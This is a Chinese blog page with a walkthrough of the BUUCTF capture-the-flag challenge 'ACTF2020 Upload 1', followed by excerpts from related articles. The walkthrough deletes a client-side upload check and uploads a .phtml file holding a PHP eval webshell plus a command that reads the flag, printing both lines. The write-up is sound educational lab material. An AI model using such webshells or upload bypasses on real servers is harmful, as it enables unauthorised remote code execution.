buuctf-web-[ACTF2020 新生赛]Upload 1-wp

最新推荐文章于 2024-05-04 23:11:47 发布
最新推荐文章于 2024-05-04 23:11:47 发布
阅读量3.5k 收藏 1
点赞数 1
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/109624643
版权

[ACTF2020 新生赛]Upload 1

知识点

  • 文件上传前端校验
  • .phtml的用法

过程

在这里插入图片描述
来到主页发现是一个文件上传的题目。
先随便上传一个文件试一试。
在这里插入图片描述我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。
可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。
在这里插入图片描述发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。
对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。
将以下代码写入该文件中。

<script language='php'>@eval($_POST['a']);</script>
<script language='php'>system('cat /flag');</script>

继续上传test.phtml 可以看到flag

居上7788
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
buuctf [ACTF2020 新生]Upload 1
hintll的博客
06-15 253
目的标应该还是一道文件上传目: 打开看看 找到了上传点,先上传一个.php的一句话木马试一下 显示该文件不允许上传,请上传jpg、png、gift结尾的图片 看一下有没有白名单或者黑名单 足迹F12看源码: 看到有个checkfile的函数 看看能不能直接删掉 还真的能被删掉 然后传了一个php文件 但是什么回显都没有 一个是后端也被过滤了一遍 那就试一下这个东西能不能传上去 也不行 那就burpsuit抓包fuzz一下 分析phtml可以有回显 那就写一个phtml的一句话木马 可以参考之前的文
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
[ACTF2020 新生]Upload1
人若无名,便可专心练剑
03-19 909
[ACTF2020 新生]Upload1
[ACTF2020 新生]Upload1(详解)
2301_77451464的博客
02-04 1155
buuctf web [ACTF2020 新生]Upload1(详解)
[ACTF2020 新生]Upload 1
最新发布
weixin_63139305的博客
05-04 216
这是一道比较简单的文件上传,我直接一次就做出来了。[ACTF2020 新生]Upload
文件上传 [ACTF2020 新生]Upload1
m0_75178803的博客
11-12 629
上传htaccess文件的时候,因为有前端校验,我们把前端校验删了以后发现能够成功上传htaccess文件,但是接着上传jpg格式的一句话木马时却连不上。.phtml文件告诉网络服务器,这些文件是由服务器生成的带有动态内容的html文件,就像浏览器中的.php文件表现一样。最开始我想到的做法是先上传htaccess文件,bp修改文件头,上传成功后然后再上传以jpg为文件后缀的一句话木马。发现网站前端有白名单限制,只能上传含有jpg,png,gif的后缀文件。打开目,发现是一道文件上传目。
[ACTF 2020 新生] Upload
Web学习之路
05-22 368
文件上传
BUUCTF-Web[ACTF2020 新生]Upload
rumil的博客
06-24 2195
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml时上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传。
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
PPJEmailPicker UITextField替换以选择多个电子邮件演示版使用CocoaPods进行安装播客文件Podfile添加到您的Podfile : pod 'PPJEmailPicker'用法以编程方式第1步-导入标# import " PPJEmailPicker.h "第2步-创建...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
1. **矩阵运算**:MATLAB的基础是矩阵,它支持各种矩阵运算,如加法、减法、乘法、除法、转置、逆矩阵、求解线性方程组等。实例可能包括创建不同类型的矩阵(对角矩阵、单位矩阵、稀疏矩阵等),以及进行矩阵运算的...
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类要构造样式,并结合实例分析了各种构造样式对...
光立方888 573 2803程序
06-14
1. 初始化:设置573和2803芯片的工作模式,如时钟频率、PWM占空比等。 2. 数据传输:编写代码将图像或动画数据发送到573芯片,由573将数据暂存并传送到对应的2803芯片。 3. 灰度控制:通过PWM技术控制2803芯片的输出...
[ACTF2020 新生]Upload
2301_80156923的博客
12-17 271
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。说明只能上传jpg,png,gif等后缀的文件,那接下来我们就抓包修改数据包信息,尝试修改文件的类型。经过尝试最后发现后缀改为phtml 文件能够被解析。然后用蚁剑连接,打开终端查看就可以获得flag。鼠标移到灯泡上显示可以上传文件。该可在BUUCTF里找到。先上传一个php文件试试。
BUUCTF-Web- [ACTF2020 新生]Upload
weixin_67813445的博客
03-14 129
考察文件上传前端校验以及.phtml的用法
[ACTF2020 新生]Upload--BUUCTF
XiaoYeZhu_1314的博客
04-24 383
得到:Upload Success!第二步:使用bp抓上传jpg文件的包,在修改文件后缀名为phtml。第一步:上传php文件,他提示,只能上传jpg、png、gif。第四步:拼接访问,连接蚁剑,找到flag。第三步:进行放过,在访问浏览器。
[ACTF2020 新生]Upload-1
V50小白
10-08 5233
小编今天又来写文章啦,距离上次写文章过了一个多月,小编前段时间太忙,好久没更新文章了。现在小编回来继续做着安全的目,这次是一个BUUCTF平台的一到文件上传漏洞。以下为小编为小伙伴们的解思路:, 1、目内容, 鼠标放在灯泡上发现存在文件上传。 2、随便上传一张图片,如下可得图片上传保存的地址,访问试试看 3、试着上传php一句话马文件,出现只能上传图片 4、Burp抓包发现,对文件格式只在前台验证好办多了,思路:先上传一张一句话马图片,抓包将图片尾缀改为php文件,发现原来
[ACTF2020 新生]BackupFile 1
07-25
鉴于提供的引用内容,\[ACTF2020 新生\]BackupFile 1是一道目,它涉及到备份文件的寻找和查看。常见的备份文件包括“.git”、“.svn”、“.swp”、“.~”、“.bak”、“.bash_history”、“.bkf”。可以使用...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值